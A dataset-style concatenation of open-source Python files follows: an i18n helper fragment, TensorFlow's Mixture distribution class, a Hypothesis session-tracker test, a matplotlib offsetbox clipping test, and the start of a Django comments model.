def mark (text):
return str (text)
def safe_eval (value, encoding = None) :
if encoding and not isinstance (value, str) :
try :
value = value.decode (encoding)
except Exception as exc :
print (repr (value), encoding)
raise
try :
result = TFL.r_eval (value)
except SyntaxError :
print (value)
raise
return result
@TFL.Contextmanager
def test_language (lang) :
from _TFL.sos import path
ld = path.join \
(path.abspath (path.dirname (path.dirname (__file__))), "locale")
load (lang, locale_dir = ld)
with context (lang) :
yield
def ugettext (text, trans = None) :
try :
translator = (trans or Config.current).ugettext
except AttributeError :
return text
else :
return translator (text)
def ungettext (singular, plural = None, n = 99, trans = None) :
if n == 1 :
return ugettext (singular, trans)
else :
if plural is None :
plural = singular + "s"
try :
translator = (trans or Config.current).ungettext
except AttributeError :
return plural
else :
return translator (singular, plural, n)
def use (* lang) :
Config.choice = (l, v) = choose (* lang)
Config.current = Config.Languages [l]
_ = mark
def _T (s) :
if s :
return ugettext (s)
return s
_Tn = ungettext
Name = _Name_ ()
if __name__ != "__main__" :
TFL._Export_Module ()
| true
| true
|
1c421c8fa09d98cc032788271130bc9b9f3fb194
| 17,010
|
py
|
Python
|
tensorflow/contrib/distributions/python/ops/mixture.py
|
gnoses/TensorFlow
|
63a21e054007d86269ed1ad0145ebce04ee57a81
|
[
"Apache-2.0"
] | 1
|
2017-02-24T05:09:40.000Z
|
2017-02-24T05:09:40.000Z
|
tensorflow/contrib/distributions/python/ops/mixture.py
|
gnoses/TensorFlow
|
63a21e054007d86269ed1ad0145ebce04ee57a81
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/distributions/python/ops/mixture.py
|
gnoses/TensorFlow
|
63a21e054007d86269ed1ad0145ebce04ee57a81
|
[
"Apache-2.0"
] | 1
|
2021-02-16T15:38:50.000Z
|
2021-02-16T15:38:50.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Mixture distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops import categorical
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
class Mixture(distribution.Distribution):
"""Mixture distribution.
The `Mixture` object implements batched mixture distributions.
The mixture model is defined by a `Categorical` distribution (the mixture)
and a python list of `Distribution` objects.
Methods supported include `log_prob`, `prob`, `mean`, `sample`, and
`entropy_lower_bound`.
"""
def __init__(self,
cat,
components,
validate_args=False,
allow_nan_stats=True,
name="Mixture"):
"""Initialize a Mixture distribution.
A `Mixture` is defined by a `Categorical` (`cat`, representing the
mixture probabilities) and a list of `Distribution` objects
all having matching dtype, batch shape, event shape, and continuity
properties (the components).
The `num_classes` of `cat` must be possible to infer at graph construction
time and match `len(components)`.
Args:
cat: A `Categorical` distribution instance, representing the probabilities
of `distributions`.
components: A list or tuple of `Distribution` instances.
Each instance must have the same type, be defined on the same domain,
and have matching `event_shape` and `batch_shape`.
validate_args: Python `bool`, default `False`. If `True`, raise a runtime
error if batch or event ranks are inconsistent between cat and any of
the distributions. This is only checked if the ranks cannot be
determined statically at graph construction time.
allow_nan_stats: Boolean, default `True`. If `False`, raise an
exception if a statistic (e.g. mean/mode/etc...) is undefined for any
batch member. If `True`, batch members with valid parameters leading to
undefined statistics will return NaN for this statistic.
name: A name for this distribution (optional).
Raises:
TypeError: If cat is not a `Categorical`, or `components` is not
a list or tuple, or the elements of `components` are not
instances of `Distribution`, or do not have matching `dtype`.
ValueError: If `components` is an empty list or tuple, or its
elements do not have a statically known event rank.
If `cat.num_classes` cannot be inferred at graph creation time,
or the constant value of `cat.num_classes` is not equal to
`len(components)`, or all `components` and `cat` do not have
matching static batch shapes, or all components do not
have matching static event shapes.
"""
parameters = locals()
if not isinstance(cat, categorical.Categorical):
raise TypeError("cat must be a Categorical distribution, but saw: %s" %
cat)
if not components:
raise ValueError("components must be a non-empty list or tuple")
if not isinstance(components, (list, tuple)):
raise TypeError("components must be a list or tuple, but saw: %s" %
components)
if not all(isinstance(c, distribution.Distribution) for c in components):
raise TypeError(
"all entries in components must be Distribution instances"
" but saw: %s" % components)
dtype = components[0].dtype
if not all(d.dtype == dtype for d in components):
raise TypeError("All components must have the same dtype, but saw "
"dtypes: %s" % [(d.name, d.dtype) for d in components])
is_continuous = components[0].is_continuous
if not all(d.is_continuous == is_continuous for d in components):
raise TypeError(
"All components must either be continuous or not, but continuity "
"values are: %s" % [(d.name, d.is_continuous) for d in components])
static_event_shape = components[0].event_shape
static_batch_shape = cat.batch_shape
for d in components:
static_event_shape = static_event_shape.merge_with(d.event_shape)
static_batch_shape = static_batch_shape.merge_with(d.batch_shape)
if static_event_shape.ndims is None:
raise ValueError(
"Expected to know rank(event_shape) from components, but "
"none of the components provide a static number of ndims")
# Ensure that all batch and event ndims are consistent.
with ops.name_scope(name, values=[cat.logits]) as ns:
num_components = cat.event_size
static_num_components = tensor_util.constant_value(num_components)
if static_num_components is None:
raise ValueError(
"Could not infer number of classes from cat and unable "
"to compare this value to the number of components passed in.")
# Possibly convert from numpy 0-D array.
static_num_components = int(static_num_components)
if static_num_components != len(components):
raise ValueError("cat.num_classes != len(components): %d vs. %d" %
(static_num_components, len(components)))
cat_batch_shape = cat.batch_shape_tensor()
cat_batch_rank = array_ops.size(cat_batch_shape)
if validate_args:
batch_shapes = [d.batch_shape_tensor() for d in components]
batch_ranks = [array_ops.size(bs) for bs in batch_shapes]
check_message = ("components[%d] batch shape must match cat "
"batch shape")
self._assertions = [
check_ops.assert_equal(
cat_batch_rank, batch_ranks[di], message=check_message % di)
for di in range(len(components))
]
self._assertions += [
check_ops.assert_equal(
cat_batch_shape, batch_shapes[di], message=check_message % di)
for di in range(len(components))
]
else:
self._assertions = []
self._cat = cat
self._components = list(components)
self._num_components = static_num_components
self._static_event_shape = static_event_shape
self._static_batch_shape = static_batch_shape
# We let the Mixture distribution access _graph_parents since its arguably
# more like a baseclass.
graph_parents = self._cat._graph_parents # pylint: disable=protected-access
for c in self._components:
graph_parents += c._graph_parents # pylint: disable=protected-access
super(Mixture, self).__init__(
dtype=dtype,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
is_continuous=is_continuous,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=graph_parents,
name=ns)
@property
def cat(self):
return self._cat
@property
def components(self):
return self._components
@property
def num_components(self):
return self._num_components
def _batch_shape_tensor(self):
return self._cat.batch_shape_tensor()
def _batch_shape(self):
return self._static_batch_shape
def _event_shape_tensor(self):
return self._components[0].event_shape_tensor()
def _event_shape(self):
return self._static_event_shape
def _mean(self):
with ops.control_dependencies(self._assertions):
distribution_means = [d.mean() for d in self.components]
cat_probs = self._cat_probs(log_probs=False)
# This was checked to not be None at construction time.
static_event_rank = self.event_shape.ndims
# Expand the rank of x up to static_event_rank times so that
# broadcasting works correctly.
def expand(x):
expanded_x = x
for _ in range(static_event_rank):
expanded_x = array_ops.expand_dims(expanded_x, -1)
return expanded_x
cat_probs = [expand(c_p) for c_p in cat_probs]
partial_means = [
c_p * m for (c_p, m) in zip(cat_probs, distribution_means)
]
# These should all be the same shape by virtue of matching
# batch_shape and event_shape.
return math_ops.add_n(partial_means)
def _log_prob(self, x):
with ops.control_dependencies(self._assertions):
x = ops.convert_to_tensor(x, name="x")
distribution_log_probs = [d.log_prob(x) for d in self.components]
cat_log_probs = self._cat_probs(log_probs=True)
final_log_probs = [
cat_lp + d_lp
for (cat_lp, d_lp) in zip(cat_log_probs, distribution_log_probs)
]
concat_log_probs = array_ops.stack(final_log_probs, 0)
log_sum_exp = math_ops.reduce_logsumexp(concat_log_probs, [0])
return log_sum_exp
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _sample_n(self, n, seed=None):
with ops.control_dependencies(self._assertions):
n = ops.convert_to_tensor(n, name="n")
static_n = tensor_util.constant_value(n)
n = int(static_n) if static_n is not None else n
cat_samples = self.cat.sample(n, seed=seed)
static_samples_shape = cat_samples.get_shape()
if static_samples_shape.is_fully_defined():
samples_shape = static_samples_shape.as_list()
samples_size = static_samples_shape.num_elements()
else:
samples_shape = array_ops.shape(cat_samples)
samples_size = array_ops.size(cat_samples)
static_batch_shape = self.batch_shape
if static_batch_shape.is_fully_defined():
batch_shape = static_batch_shape.as_list()
batch_size = static_batch_shape.num_elements()
else:
batch_shape = self.batch_shape_tensor()
batch_size = array_ops.reduce_prod(batch_shape)
static_event_shape = self.event_shape
if static_event_shape.is_fully_defined():
event_shape = np.array(static_event_shape.as_list(), dtype=np.int32)
else:
event_shape = self.event_shape_tensor()
# Get indices into the raw cat sampling tensor. We will
# need these to stitch sample values back out after sampling
# within the component partitions.
samples_raw_indices = array_ops.reshape(
math_ops.range(0, samples_size), samples_shape)
# Partition the raw indices so that we can use
# dynamic_stitch later to reconstruct the samples from the
# known partitions.
partitioned_samples_indices = data_flow_ops.dynamic_partition(
data=samples_raw_indices,
partitions=cat_samples,
num_partitions=self.num_components)
# Copy the batch indices n times, as we will need to know
# these to pull out the appropriate rows within the
# component partitions.
batch_raw_indices = array_ops.reshape(
array_ops.tile(math_ops.range(0, batch_size), [n]), samples_shape)
# Explanation of the dynamic partitioning below:
# batch indices are i.e., [0, 1, 0, 1, 0, 1]
# Suppose partitions are:
# [1 1 0 0 1 1]
# After partitioning, batch indices are cut as:
# [batch_indices[x] for x in 2, 3]
# [batch_indices[x] for x in 0, 1, 4, 5]
# i.e.
# [1 1] and [0 0 0 0]
# Now we sample n=2 from part 0 and n=4 from part 1.
# For part 0 we want samples from batch entries 1, 1 (samples 0, 1),
# and for part 1 we want samples from batch entries 0, 0, 0, 0
# (samples 0, 1, 2, 3).
partitioned_batch_indices = data_flow_ops.dynamic_partition(
data=batch_raw_indices,
partitions=cat_samples,
num_partitions=self.num_components)
samples_class = [None for _ in range(self.num_components)]
for c in range(self.num_components):
n_class = array_ops.size(partitioned_samples_indices[c])
seed = distribution_util.gen_new_seed(seed, "mixture")
samples_class_c = self.components[c].sample(n_class, seed=seed)
# Pull out the correct batch entries from each index.
# To do this, we may have to flatten the batch shape.
# For sample s, batch element b of component c, we get the
# partitioned batch indices from
# partitioned_batch_indices[c]; and shift each element by
# the sample index. The final lookup can be thought of as
# a matrix gather along locations (s, b) in
# samples_class_c where the n_class rows correspond to
# samples within this component and the batch_size columns
# correspond to batch elements within the component.
#
# Thus the lookup index is
# lookup[c, i] = batch_size * s[i] + b[c, i]
# for i = 0 ... n_class[c] - 1.
lookup_partitioned_batch_indices = (
batch_size * math_ops.range(n_class) +
partitioned_batch_indices[c])
samples_class_c = array_ops.reshape(
samples_class_c,
array_ops.concat([[n_class * batch_size], event_shape], 0))
samples_class_c = array_ops.gather(
samples_class_c, lookup_partitioned_batch_indices,
name="samples_class_c_gather")
samples_class[c] = samples_class_c
# Stitch back together the samples across the components.
lhs_flat_ret = data_flow_ops.dynamic_stitch(
indices=partitioned_samples_indices, data=samples_class)
# Reshape back to proper sample, batch, and event shape.
ret = array_ops.reshape(lhs_flat_ret,
array_ops.concat([samples_shape,
self.event_shape_tensor()], 0))
ret.set_shape(
tensor_shape.TensorShape(static_samples_shape).concatenate(
self.event_shape))
return ret
def entropy_lower_bound(self, name="entropy_lower_bound"):
r"""A lower bound on the entropy of this mixture model.
The bound below is not always very tight, and its usefulness depends
on the mixture probabilities and the components in use.
A lower bound is useful for ELBO when the `Mixture` is the variational
distribution:
\\(
\log p(x) >= ELBO = \int q(z) \log p(x, z) dz + H[q]
\\)
where \\( p \\) is the prior distribution, \\( q \\) is the variational,
and \\( H[q] \\) is the entropy of \\( q \\). If there is a lower bound
\\( G[q] \\) such that \\( H[q] \geq G[q] \\) then it can be used in
place of \\( H[q] \\).
For a mixture of distributions \\( q(Z) = \sum_i c_i q_i(Z) \\) with
\\( \sum_i c_i = 1 \\), by the concavity of \\( f(x) = -x \log x \\), a
simple lower bound is:
\\(
\begin{align}
H[q] & = - \int q(z) \log q(z) dz \\\
& = - \int (\sum_i c_i q_i(z)) \log(\sum_i c_i q_i(z)) dz \\\
& \geq - \sum_i c_i \int q_i(z) \log q_i(z) dz \\\
& = \sum_i c_i H[q_i]
\end{align}
\\)
This is the term we calculate below for \\( G[q] \\).
Args:
name: A name for this operation (optional).
Returns:
A lower bound on the Mixture's entropy.
"""
with self._name_scope(name, values=[self.cat.logits]):
with ops.control_dependencies(self._assertions):
distribution_entropies = [d.entropy() for d in self.components]
cat_probs = self._cat_probs(log_probs=False)
partial_entropies = [
c_p * m for (c_p, m) in zip(cat_probs, distribution_entropies)
]
# These are all the same shape by virtue of matching batch_shape
return math_ops.add_n(partial_entropies)
def _cat_probs(self, log_probs):
"""Get a list of num_components batchwise probabilities."""
which_softmax = nn_ops.log_softmax if log_probs else nn_ops.softmax
cat_probs = which_softmax(self.cat.logits)
cat_probs = array_ops.unstack(cat_probs, num=self.num_components, axis=-1)
return cat_probs
| 42
| 80
| 0.671193
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops import categorical
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
class Mixture(distribution.Distribution):
def __init__(self,
cat,
components,
validate_args=False,
allow_nan_stats=True,
name="Mixture"):
parameters = locals()
if not isinstance(cat, categorical.Categorical):
raise TypeError("cat must be a Categorical distribution, but saw: %s" %
cat)
if not components:
raise ValueError("components must be a non-empty list or tuple")
if not isinstance(components, (list, tuple)):
raise TypeError("components must be a list or tuple, but saw: %s" %
components)
if not all(isinstance(c, distribution.Distribution) for c in components):
raise TypeError(
"all entries in components must be Distribution instances"
" but saw: %s" % components)
dtype = components[0].dtype
if not all(d.dtype == dtype for d in components):
raise TypeError("All components must have the same dtype, but saw "
"dtypes: %s" % [(d.name, d.dtype) for d in components])
is_continuous = components[0].is_continuous
if not all(d.is_continuous == is_continuous for d in components):
raise TypeError(
"All components must either be continuous or not, but continuity "
"values are: %s" % [(d.name, d.is_continuous) for d in components])
static_event_shape = components[0].event_shape
static_batch_shape = cat.batch_shape
for d in components:
static_event_shape = static_event_shape.merge_with(d.event_shape)
static_batch_shape = static_batch_shape.merge_with(d.batch_shape)
if static_event_shape.ndims is None:
raise ValueError(
"Expected to know rank(event_shape) from components, but "
"none of the components provide a static number of ndims")
with ops.name_scope(name, values=[cat.logits]) as ns:
num_components = cat.event_size
static_num_components = tensor_util.constant_value(num_components)
if static_num_components is None:
raise ValueError(
"Could not infer number of classes from cat and unable "
"to compare this value to the number of components passed in.")
static_num_components = int(static_num_components)
if static_num_components != len(components):
raise ValueError("cat.num_classes != len(components): %d vs. %d" %
(static_num_components, len(components)))
cat_batch_shape = cat.batch_shape_tensor()
cat_batch_rank = array_ops.size(cat_batch_shape)
if validate_args:
batch_shapes = [d.batch_shape_tensor() for d in components]
batch_ranks = [array_ops.size(bs) for bs in batch_shapes]
check_message = ("components[%d] batch shape must match cat "
"batch shape")
self._assertions = [
check_ops.assert_equal(
cat_batch_rank, batch_ranks[di], message=check_message % di)
for di in range(len(components))
]
self._assertions += [
check_ops.assert_equal(
cat_batch_shape, batch_shapes[di], message=check_message % di)
for di in range(len(components))
]
else:
self._assertions = []
self._cat = cat
self._components = list(components)
self._num_components = static_num_components
self._static_event_shape = static_event_shape
self._static_batch_shape = static_batch_shape
graph_parents = self._cat._graph_parents
for c in self._components:
graph_parents += c._graph_parents
super(Mixture, self).__init__(
dtype=dtype,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
is_continuous=is_continuous,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=graph_parents,
name=ns)
@property
def cat(self):
return self._cat
@property
def components(self):
return self._components
@property
def num_components(self):
return self._num_components
def _batch_shape_tensor(self):
return self._cat.batch_shape_tensor()
def _batch_shape(self):
return self._static_batch_shape
def _event_shape_tensor(self):
return self._components[0].event_shape_tensor()
def _event_shape(self):
return self._static_event_shape
def _mean(self):
with ops.control_dependencies(self._assertions):
distribution_means = [d.mean() for d in self.components]
cat_probs = self._cat_probs(log_probs=False)
static_event_rank = self.event_shape.ndims
def expand(x):
expanded_x = x
for _ in range(static_event_rank):
expanded_x = array_ops.expand_dims(expanded_x, -1)
return expanded_x
cat_probs = [expand(c_p) for c_p in cat_probs]
partial_means = [
c_p * m for (c_p, m) in zip(cat_probs, distribution_means)
]
return math_ops.add_n(partial_means)
def _log_prob(self, x):
with ops.control_dependencies(self._assertions):
x = ops.convert_to_tensor(x, name="x")
distribution_log_probs = [d.log_prob(x) for d in self.components]
cat_log_probs = self._cat_probs(log_probs=True)
final_log_probs = [
cat_lp + d_lp
for (cat_lp, d_lp) in zip(cat_log_probs, distribution_log_probs)
]
concat_log_probs = array_ops.stack(final_log_probs, 0)
log_sum_exp = math_ops.reduce_logsumexp(concat_log_probs, [0])
return log_sum_exp
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _sample_n(self, n, seed=None):
with ops.control_dependencies(self._assertions):
n = ops.convert_to_tensor(n, name="n")
static_n = tensor_util.constant_value(n)
n = int(static_n) if static_n is not None else n
cat_samples = self.cat.sample(n, seed=seed)
static_samples_shape = cat_samples.get_shape()
if static_samples_shape.is_fully_defined():
samples_shape = static_samples_shape.as_list()
samples_size = static_samples_shape.num_elements()
else:
samples_shape = array_ops.shape(cat_samples)
samples_size = array_ops.size(cat_samples)
static_batch_shape = self.batch_shape
if static_batch_shape.is_fully_defined():
batch_shape = static_batch_shape.as_list()
batch_size = static_batch_shape.num_elements()
else:
batch_shape = self.batch_shape_tensor()
batch_size = array_ops.reduce_prod(batch_shape)
static_event_shape = self.event_shape
if static_event_shape.is_fully_defined():
event_shape = np.array(static_event_shape.as_list(), dtype=np.int32)
else:
event_shape = self.event_shape_tensor()
samples_raw_indices = array_ops.reshape(
math_ops.range(0, samples_size), samples_shape)
partitioned_samples_indices = data_flow_ops.dynamic_partition(
data=samples_raw_indices,
partitions=cat_samples,
num_partitions=self.num_components)
batch_raw_indices = array_ops.reshape(
array_ops.tile(math_ops.range(0, batch_size), [n]), samples_shape)
partitioned_batch_indices = data_flow_ops.dynamic_partition(
data=batch_raw_indices,
partitions=cat_samples,
num_partitions=self.num_components)
samples_class = [None for _ in range(self.num_components)]
for c in range(self.num_components):
n_class = array_ops.size(partitioned_samples_indices[c])
seed = distribution_util.gen_new_seed(seed, "mixture")
samples_class_c = self.components[c].sample(n_class, seed=seed)
lookup_partitioned_batch_indices = (
batch_size * math_ops.range(n_class) +
partitioned_batch_indices[c])
samples_class_c = array_ops.reshape(
samples_class_c,
array_ops.concat([[n_class * batch_size], event_shape], 0))
samples_class_c = array_ops.gather(
samples_class_c, lookup_partitioned_batch_indices,
name="samples_class_c_gather")
samples_class[c] = samples_class_c
lhs_flat_ret = data_flow_ops.dynamic_stitch(
indices=partitioned_samples_indices, data=samples_class)
ret = array_ops.reshape(lhs_flat_ret,
array_ops.concat([samples_shape,
self.event_shape_tensor()], 0))
ret.set_shape(
tensor_shape.TensorShape(static_samples_shape).concatenate(
self.event_shape))
return ret
def entropy_lower_bound(self, name="entropy_lower_bound"):
with self._name_scope(name, values=[self.cat.logits]):
with ops.control_dependencies(self._assertions):
distribution_entropies = [d.entropy() for d in self.components]
cat_probs = self._cat_probs(log_probs=False)
partial_entropies = [
c_p * m for (c_p, m) in zip(cat_probs, distribution_entropies)
]
return math_ops.add_n(partial_entropies)
def _cat_probs(self, log_probs):
which_softmax = nn_ops.log_softmax if log_probs else nn_ops.softmax
cat_probs = which_softmax(self.cat.logits)
cat_probs = array_ops.unstack(cat_probs, num=self.num_components, axis=-1)
return cat_probs
| true
| true
|
1c421d28381f9d123cea2b322a695d6ce0506811
| 3,350
|
py
|
Python
|
tests/h/util/session_tracker_test.py
|
julien-cheng/h
|
36c8ec044725720cf36f0986cdf025395aca8929
|
[
"BSD-2-Clause"
] | 2
|
2019-08-04T07:22:11.000Z
|
2020-07-17T05:01:41.000Z
|
tests/h/util/session_tracker_test.py
|
fuelpress/i.fuel.press
|
af7b25895d813af0fef656dcf483afe852a99d76
|
[
"BSD-2-Clause"
] | null | null | null |
tests/h/util/session_tracker_test.py
|
fuelpress/i.fuel.press
|
af7b25895d813af0fef656dcf483afe852a99d76
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import unicode_literals
from uuid import uuid4
import pytest
from sqlalchemy.orm.util import identity_key
from h.db.types import _get_urlsafe_from_hex
from h.models import Annotation, Document
from h.util.session_tracker import Tracker, ObjectState
def generate_ann_id():
"""
Generate a random annotation identifier in the encoded form used by the API.
"""
return _get_urlsafe_from_hex(str(uuid4()))
class TestTracker(object):
def test_uncommitted_changes_returns_unflushed_changes(
self, tracker, session, expected_changes
):
added_entry, changed_entry, deleted_entry = expected_changes
changes = tracker.uncommitted_changes()
assert added_entry in changes
assert changed_entry in changes
assert deleted_entry in changes
def test_uncommitted_changes_returns_flushed_changes(
self, tracker, session, expected_changes
):
added_entry, changed_entry, deleted_entry = expected_changes
session.flush()
changes = tracker.uncommitted_changes()
assert added_entry in changes
assert changed_entry in changes
assert deleted_entry in changes
def test_uncommitted_changes_does_not_return_committed_changes(
self, tracker, session
):
session.commit()
assert tracker.uncommitted_changes() == []
def test_uncommitted_changes_does_not_return_rolled_back_changes(
self, tracker, session
):
session.rollback()
assert tracker.uncommitted_changes() == []
@pytest.fixture
def expected_changes(self, added_ann_id, changed_ann_id, deleted_ann_id):
added_entry = (identity_key(Annotation, (added_ann_id,)), ObjectState.ADDED)
changed_entry = (
identity_key(Annotation, (changed_ann_id,)),
ObjectState.CHANGED,
)
deleted_entry = (
identity_key(Annotation, (deleted_ann_id,)),
ObjectState.DELETED,
)
return (added_entry, changed_entry, deleted_entry)
@pytest.fixture
def added_ann_id(self):
return generate_ann_id()
@pytest.fixture
def changed_ann_id(self):
return generate_ann_id()
@pytest.fixture
def deleted_ann_id(self):
return generate_ann_id()
@pytest.fixture
def session(self, db_session, added_ann_id, changed_ann_id, deleted_ann_id):
# Populate the DB session with different types of change relative to the
# last-committed state. We could use any model object for this purpose
# but annotations are the primary object in the system.
doc = Document(web_uri="https://example.org")
changed = Annotation(
id=changed_ann_id, userid="foo", groupid="wibble", document=doc
)
deleted = Annotation(
id=deleted_ann_id, userid="foo", groupid="wibble", document=doc
)
db_session.add(changed)
db_session.add(deleted)
db_session.commit()
changed.text = "changed text"
db_session.delete(deleted)
added = Annotation(
id=added_ann_id, userid="foo", groupid="wibble", document=doc
)
db_session.add(added)
return db_session
@pytest.fixture
def tracker(self, db_session):
return Tracker(db_session)
| 30.18018
| 84
| 0.678507
|
from __future__ import unicode_literals
from uuid import uuid4
import pytest
from sqlalchemy.orm.util import identity_key
from h.db.types import _get_urlsafe_from_hex
from h.models import Annotation, Document
from h.util.session_tracker import Tracker, ObjectState
def generate_ann_id():
return _get_urlsafe_from_hex(str(uuid4()))
class TestTracker(object):
def test_uncommitted_changes_returns_unflushed_changes(
self, tracker, session, expected_changes
):
added_entry, changed_entry, deleted_entry = expected_changes
changes = tracker.uncommitted_changes()
assert added_entry in changes
assert changed_entry in changes
assert deleted_entry in changes
def test_uncommitted_changes_returns_flushed_changes(
self, tracker, session, expected_changes
):
added_entry, changed_entry, deleted_entry = expected_changes
session.flush()
changes = tracker.uncommitted_changes()
assert added_entry in changes
assert changed_entry in changes
assert deleted_entry in changes
def test_uncommitted_changes_does_not_return_committed_changes(
self, tracker, session
):
session.commit()
assert tracker.uncommitted_changes() == []
def test_uncommitted_changes_does_not_return_rolled_back_changes(
self, tracker, session
):
session.rollback()
assert tracker.uncommitted_changes() == []
@pytest.fixture
def expected_changes(self, added_ann_id, changed_ann_id, deleted_ann_id):
added_entry = (identity_key(Annotation, (added_ann_id,)), ObjectState.ADDED)
changed_entry = (
identity_key(Annotation, (changed_ann_id,)),
ObjectState.CHANGED,
)
deleted_entry = (
identity_key(Annotation, (deleted_ann_id,)),
ObjectState.DELETED,
)
return (added_entry, changed_entry, deleted_entry)
@pytest.fixture
def added_ann_id(self):
return generate_ann_id()
@pytest.fixture
def changed_ann_id(self):
return generate_ann_id()
@pytest.fixture
def deleted_ann_id(self):
return generate_ann_id()
@pytest.fixture
def session(self, db_session, added_ann_id, changed_ann_id, deleted_ann_id):
doc = Document(web_uri="https://example.org")
changed = Annotation(
id=changed_ann_id, userid="foo", groupid="wibble", document=doc
)
deleted = Annotation(
id=deleted_ann_id, userid="foo", groupid="wibble", document=doc
)
db_session.add(changed)
db_session.add(deleted)
db_session.commit()
changed.text = "changed text"
db_session.delete(deleted)
added = Annotation(
id=added_ann_id, userid="foo", groupid="wibble", document=doc
)
db_session.add(added)
return db_session
@pytest.fixture
def tracker(self, db_session):
return Tracker(db_session)
| true
| true
|
1c421d4c0b1c6e259ed2a537e534baf86c9bbbdc
| 1,603
|
py
|
Python
|
lib/matplotlib/tests/test_offsetbox.py
|
pmarshwx/matplotlib
|
12be528dbf2114f7c25abf60de8100cb2d4494af
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
lib/matplotlib/tests/test_offsetbox.py
|
pmarshwx/matplotlib
|
12be528dbf2114f7c25abf60de8100cb2d4494af
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
lib/matplotlib/tests/test_offsetbox.py
|
pmarshwx/matplotlib
|
12be528dbf2114f7c25abf60de8100cb2d4494af
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import nose
from matplotlib.testing.decorators import image_comparison
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import matplotlib.lines as mlines
from matplotlib.offsetbox import AnchoredOffsetbox, DrawingArea
@image_comparison(baseline_images=['offsetbox_clipping'], remove_text=True)
def test_offsetbox_clipping():
# - create a plot
# - put an AnchoredOffsetbox with a child DrawingArea
# at the center of the axes
# - give the DrawingArea a gray background
# - put a black line across the bounds of the DrawingArea
# - see that the black line is clipped to the edges of
# the DrawingArea.
fig, ax = plt.subplots()
size = 100
da = DrawingArea(size, size, clip=True)
bg = mpatches.Rectangle((0, 0), size, size,
facecolor='#CCCCCC',
edgecolor='None',
linewidth=0)
line = mlines.Line2D([-size*.5, size*1.5], [size/2, size/2],
color='black',
linewidth=10)
anchored_box = AnchoredOffsetbox(
loc=10,
child=da,
pad=0.,
frameon=False,
bbox_to_anchor=(.5, .5),
bbox_transform=ax.transAxes,
borderpad=0.)
da.add_artist(bg)
da.add_artist(line)
ax.add_artist(anchored_box)
ax.set_xlim((0, 1))
ax.set_ylim((0, 1))
if __name__ == '__main__':
nose.runmodule(argv=['-s', '--with-doctest'], exit=False)
| 32.06
| 75
| 0.621335
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import nose
from matplotlib.testing.decorators import image_comparison
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import matplotlib.lines as mlines
from matplotlib.offsetbox import AnchoredOffsetbox, DrawingArea
@image_comparison(baseline_images=['offsetbox_clipping'], remove_text=True)
def test_offsetbox_clipping():
fig, ax = plt.subplots()
size = 100
da = DrawingArea(size, size, clip=True)
bg = mpatches.Rectangle((0, 0), size, size,
facecolor='#CCCCCC',
edgecolor='None',
linewidth=0)
line = mlines.Line2D([-size*.5, size*1.5], [size/2, size/2],
color='black',
linewidth=10)
anchored_box = AnchoredOffsetbox(
loc=10,
child=da,
pad=0.,
frameon=False,
bbox_to_anchor=(.5, .5),
bbox_transform=ax.transAxes,
borderpad=0.)
da.add_artist(bg)
da.add_artist(line)
ax.add_artist(anchored_box)
ax.set_xlim((0, 1))
ax.set_ylim((0, 1))
if __name__ == '__main__':
nose.runmodule(argv=['-s', '--with-doctest'], exit=False)
| true
| true
|
1c421d50e973debea0380ade73241e0e1bcd3193
| 2,269
|
py
|
Python
|
internal_external_comments/models.py
|
ortkin/django-internal-external-comments
|
ea608c34398549ca053d7b50a19cc8f614f91bf5
|
[
"MIT"
] | null | null | null |
internal_external_comments/models.py
|
ortkin/django-internal-external-comments
|
ea608c34398549ca053d7b50a19cc8f614f91bf5
|
[
"MIT"
] | null | null | null |
internal_external_comments/models.py
|
ortkin/django-internal-external-comments
|
ea608c34398549ca053d7b50a19cc8f614f91bf5
|
[
"MIT"
] | null | null | null |
from django.db import models
from django_comments.abstracts import CommentAbstractModel
from django_comments.managers import CommentManager
from django.contrib.sites.models import Site
from django.urls import reverse
class InternalExternalCommentManager(CommentManager):
def for_site(self, site=None):
if site is None:
site = Site.objects.get_current()
return self.filter(site=site)
def valid(self):
return self.for_site().filter(is_removed=False, is_public=True)
class InternalExternalComment(CommentAbstractModel):
INTERNAL = 'internal'
EXTERNAL = 'external'
INTERNAL_EXTERNAL_CHOICES = (
(INTERNAL, 'Internal'),
(EXTERNAL, 'External'),
)
internal_external = models.CharField(max_length=8,
